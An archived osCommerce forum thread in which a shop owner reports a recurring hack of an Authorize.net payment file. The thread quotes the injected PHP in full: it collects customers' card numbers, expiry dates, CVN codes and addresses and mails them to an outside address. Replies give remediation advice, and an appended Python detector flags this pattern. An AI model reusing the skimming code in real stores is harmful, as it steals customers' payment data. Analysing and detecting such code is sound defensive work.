
osCommerce


Authorize.net files hacked + report e-mail out


Sadtra


Posted

Running osCommerce 2.2-MS2... Here is the code that is added to my authorize.php file (I upload and this hack keeps returning, and only the report e-mail to address changes):

// build report
$report = 'Date: ' . date("D M j G:i:s Y");
$report .= "--" . 'Name: ' . $order->billing['firstname'] . ' ' . $order->billing['lastname'];
$report .= "--" . 'Number: ' . $this->cc_card_number;
$report .= "--" . 'Exp: ' . $this->cc_expiry_month . '/' . substr($this->cc_expiry_year, -2);
$report .= "--" . 'CVN: ' . $this->cc_card_verify;
$report .= "--" . 'Email: ' . $mail;
$report .= "--" . 'Address:' . $order->billing['street_address'] . ' City: ' . $order->billing['city'] . ' State: ' . $order->billing['state'] . ' Code: ' . $order->billing['postcode'];
$report .= "--" . 'Phone: ' . $order->customer['telephone'] . ' Country: ' . $order->billing['country']['title'];

// mail report
tep_mail('BMT', '[email protected]', '[ REPORT ] CCV notary', stripslashes($report),'', $mail);

if (MODULE_PAYMENT_AUTHORIZENET_TESTMODE == 'Test') $process_button_string .= tep_draw_hidden_field('x_Test_Request', 'TRUE');

$process_button_string .= tep_draw_hidden_field(tep_session_name(), tep_session_id());

Posted

Change all your passwords (your control panel, osCommerce admin, any .htaccess passwords).

 

After you upload the fixed version of the hacked file, set the permissions to 444 (read-only for everyone).

 

Report the hack to your host as the server may be hacked, and nothing you do will help if that's the case.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

Posted

I've seen this happening quite a bit recently, and not just with A Net. It IS down to either lax site security or servers being compromised. My best guess is the server control panel - and I'd also bet it's another cPanel exploit.

 

Vger
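
The re-infection described in the first post and the clean re-upload with mode 444 advised in the reply can be checked for automatically. This added example is not part of the original thread: it flags a payment module that passes a variable built from card fields to a mail call, differs from a clean copy, or is still writable. The sample PHP strings, the placeholder address and the function names are constructed for illustration.

```python
import hashlib
import re
import stat
from pathlib import Path

# Card properties referenced by the injected block quoted in the first post.
CARD_FIELDS = re.compile(r"\$this->cc_(card_number|card_verify|expiry_month|expiry_year)")
# Outbound mail: osCommerce's tep_mail() wrapper or PHP's mail().
MAIL_CALL = re.compile(r"\b(tep_mail|mail)\s*\(")
ASSIGN = re.compile(r"^\s*\$(\w+)\s*\.?=")

# Constructed samples modelled on the thread; the address is a placeholder.
SAMPLE_INFECTED = """\
$report = 'Date: ' . date("D M j G:i:s Y");
$report .= "--" . 'Number: ' . $this->cc_card_number;
$report .= "--" . 'CVN: ' . $this->cc_card_verify;
tep_mail('BMT', 'drop@example.invalid', '[ REPORT ]', stripslashes($report), '', $mail);
"""
SAMPLE_CLEAN = """\
$process_button_string = tep_draw_hidden_field('x_Card_Num', $this->cc_card_number);
tep_mail($name, $to, $subject, $email_order, STORE_OWNER, STORE_OWNER_EMAIL_ADDRESS);
"""


def find_card_mailers(php_source):
    """Return (line_no, text) for mail calls that send a variable built from card fields."""
    tainted, hits = set(), []
    for no, line in enumerate(php_source.splitlines(), 1):
        assigned = ASSIGN.match(line)
        if assigned and CARD_FIELDS.search(line):
            tainted.add(assigned.group(1))  # variable now carries card data
        if MAIL_CALL.search(line):
            used = set(re.findall(r"\$(\w+)", line))
            if used & tainted or CARD_FIELDS.search(line):
                hits.append((no, line.strip()))
    return hits


def audit_file(path, clean_sha256):
    """Check one module file against a clean copy's hash, the 444 mode, and the mailer pattern."""
    data = Path(path).read_bytes()
    findings = []
    if hashlib.sha256(data).hexdigest() != clean_sha256:
        findings.append("content differs from clean copy")
    if stat.S_IMODE(Path(path).stat().st_mode) & 0o222:
        findings.append("file is writable (expected 444)")
    for no, _ in find_card_mailers(data.decode("utf-8", "replace")):
        findings.append(f"line {no}: card data passed to mail call")
    return findings
```

Run `audit_file` from a scheduled job against each file under the payment modules directory, with hashes taken from the distribution archive rather than from the live server.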

Archived

This topic is now archived and is closed to further replies.
